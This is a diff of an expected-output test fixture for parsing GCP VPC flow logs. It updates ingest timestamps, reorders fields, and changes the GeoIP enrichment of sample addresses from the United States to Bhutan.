@@ -1696,7 +1778,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391243800Z", + "ingested": "2021-12-14T14:43:27.415180999Z", "original": "{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", 
@@ -1707,18 +1789,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 220 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65320, 
@@ -1732,6 +1847,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415181410Z", + "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.560917237Z", + "end": "2019-06-14T03:49:56.220714119Z", + "id": "ut8lbrffooxyv", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -1743,46 +1868,6 @@ "iana_number": "6", "packets": 608, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 220 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391249300Z", - "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.560917237Z", - "end": "2019-06-14T03:49:56.220714119Z", - "id": "ut8lbrffooxyv", - "category": "network", - "type": "connection" } }, { 
@@ -1791,11 +1876,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33562, @@ -1873,7 +1963,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391254800Z", + "ingested": "2021-12-14T14:43:27.415181831Z", "original": "{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", 
@@ -1884,34 +1974,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "port": 9243, - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "source": { - "address": "10.49.136.133", - "port": 46864, - "bytes": 173805495, - "packets": 44438, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", - "bytes": 173805495, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 44438, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1922,6 +1984,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -1942,8 +2007,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 9243, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.49.136.133", + "port": 46864, + "bytes": 173805495, + "packets": 44438, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" + }, "event": { - "ingested": "2021-12-09T13:37:46.391260300Z", + "ingested": "2021-12-14T14:43:27.415182262Z", "original": "{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.306085222Z", 
@@ -1951,44 +2041,21 @@ "id": "ut8lbrffooxys", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 33478, - "bytes": 1468, - "ip": "67.43.156.13", - "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", - "bytes": 1468, + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", + "bytes": 173805495, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, + "packets": 44438, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1999,6 +2066,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -2019,8 +2089,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33478, + "bytes": 1468, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391265900Z", + "ingested": "2021-12-14T14:43:27.415182733Z", "original": "{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", 
@@ -2028,6 +2123,18 @@ "id": "ut8lbrffooxyx", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", + "bytes": 1468, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -2036,11 +2143,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33548, 
@@ -2118,7 +2230,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391271600Z", + "ingested": "2021-12-14T14:43:27.415183325Z", "original": "{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", 
@@ -2129,43 +2241,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65320, - "bytes": 70775, - "ip": "67.43.156.13", - "packets": 732 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", - "bytes": 70775, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 732, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -2176,6 +2251,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -2196,8 +2274,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65320, + "bytes": 70775, + "ip": "67.43.156.13", + "packets": 732 + }, "event": { - "ingested": "2021-12-09T13:37:46.391277200Z", + "ingested": "2021-12-14T14:43:27.415183902Z", "original": "{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", 
@@ -2205,6 +2308,18 @@ "id": "ut8lbrffooxz3", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", + "bytes": 70775, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 732, + "direction": "inbound" } }, { @@ -2219,11 +2334,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -2295,7 +2415,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391282700Z", + "ingested": "2021-12-14T14:43:27.415184425Z", "original": "{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", @@ -2317,11 +2437,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33548, 
@@ -2393,7 +2518,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391288500Z", + "ingested": "2021-12-14T14:43:27.415184917Z", "original": "{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", 
@@ -2404,41 +2529,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 34836, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1780, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", - "bytes": 1780, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -2449,6 +2539,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -2469,8 +2562,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 34836, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1780, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391292500Z", + "ingested": "2021-12-14T14:43:27.415185365Z", "original": "{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", 
@@ -2478,46 +2596,21 @@ "id": "ut8lbrffooxyy", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "vnm", - "city_name": "Vĩnh Yên", - "region_name": "Vinh Phuc Province" - }, - "as": { - "number": 45899 - }, - "address": "192.168.2.165", - "port": 59623, - "bytes": 1239, - "ip": "192.168.2.165", - "packets": 18 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", - "bytes": 1239, + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", + "bytes": 1780, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 18, - "direction": "inbound" - }, + "packets": 7, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2528,6 +2621,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -2548,8 +2644,30 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "vnm", + "city_name": "Vĩnh Yên", + "region_name": "Vinh Phuc Province" + }, + "as": { + "number": 45899 + }, + "address": "192.168.2.165", + "port": 59623, + "bytes": 1239, + "ip": "192.168.2.165", + "packets": 18 + }, "event": { - "ingested": "2021-12-09T13:37:46.391296900Z", + "ingested": "2021-12-14T14:43:27.415185758Z", "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", 
